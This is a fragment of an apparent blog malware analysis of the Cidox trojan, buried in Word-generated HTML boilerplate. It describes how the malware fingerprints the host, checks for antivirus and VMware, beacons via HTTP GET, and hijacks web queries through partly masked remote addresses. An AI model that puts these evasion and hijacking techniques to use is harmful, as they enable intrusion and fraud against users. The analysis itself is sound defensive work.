UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]-->
</span></span><br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">Cidox
gathers information on the target infected system, uses them to form a GET http
operation, send the request and awaits result. It can be seen that it checks for existing AV
engines installed (in program files directory), checks for VMware process
running, the OS and versioning.</span></span></span></div>
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;">
</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfht2WXchA8nN4FRgw_WEsWBEwKu52BGlwGHCSCxq2Tvx0Qw__Gfl5rEaS92b9HKyR6jxYSff-y7bBxd0Ht2hnyfxUunzz-6gQ8RmqAIExHewDzyxQgnfNp96_lQjhKK7O9bTfsM-BtWI/s1600/vmav.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="187" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfht2WXchA8nN4FRgw_WEsWBEwKu52BGlwGHCSCxq2Tvx0Qw__Gfl5rEaS92b9HKyR6jxYSff-y7bBxd0Ht2hnyfxUunzz-6gQ8RmqAIExHewDzyxQgnfNp96_lQjhKK7O9bTfsM-BtWI/s400/vmav.jpg" width="400" /></a></div>
<div style="text-align: center;">
<i><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"> Sample message formed by Cidox DLL</span></span></i><br />
<br />
</div>
<div style="text-align: center;">
</div>
<div style="text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZRvqKXTK5tF97MgdftOopHG_VqwOAxh-botJQdYtMnKjYtMnTzmOQOZaVEwC02HIARco41sqvx9E-5GJMV4UDY5mCzICI6zS6EDL9zNdmIq6VOIvYwfK_4XeLiwG-8xCFZe0h5w6N4UA/s1600/avhash.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="335" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZRvqKXTK5tF97MgdftOopHG_VqwOAxh-botJQdYtMnKjYtMnTzmOQOZaVEwC02HIARco41sqvx9E-5GJMV4UDY5mCzICI6zS6EDL9zNdmIq6VOIvYwfK_4XeLiwG-8xCFZe0h5w6N4UA/s400/avhash.jpg" width="400" /></a></div>
<div style="text-align: left;">
</div>
<div style="text-align: center;">
<i><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"> Checks hash for common AV filenames in Program Directory</span></span></span></i></div>
<div style="text-align: left;">
<i><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><br /></span></span></span></i>
<i><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><br /></span></span></span></i></div>
<div style="text-align: left;">
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:RelyOnVML/>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]-->
<br />
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">While
the target processes are being monitored, Cidox alters web queries sent by the
user and replaces with data coming from the following remote addresses</span></div>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"> </span></div>
<ul type="disc">
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">213.133.103.21<i>x</i></span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">V1s.c<i>x</i></span></li>
<li class="MsoNormal" style="line-height: normal; mso-list: l0 level1 lfo1; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; tab-stops: list .5in;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">1nfo.c<i>x </i></span></li>
</ul>
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"></span></div>
<div style="text-align: left;">
<span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";"></span></div>
<div style="text-align: left;">
<ul type="disc">
</ul>
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style>
<![endif]--></div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
</div>
<div style="text-align: left;">
<br />
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><b style="mso-bidi-font-weight: normal;"><span style="font-family: "Times New Roman","serif"; font-size: 12.0pt; mso-fareast-font-family: "Times New Roman";">SHUTDOWN FILE</span></b></span></span></span><br />
<span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;"><span style="font-family: Times,"Times New Roman",serif;">
</span></span></span>
<div class="MsoNormal" style="line-height: normal; mso-margin-bottom-alt: auto; mso-margin-top-alt: auto; text-align: justify;">
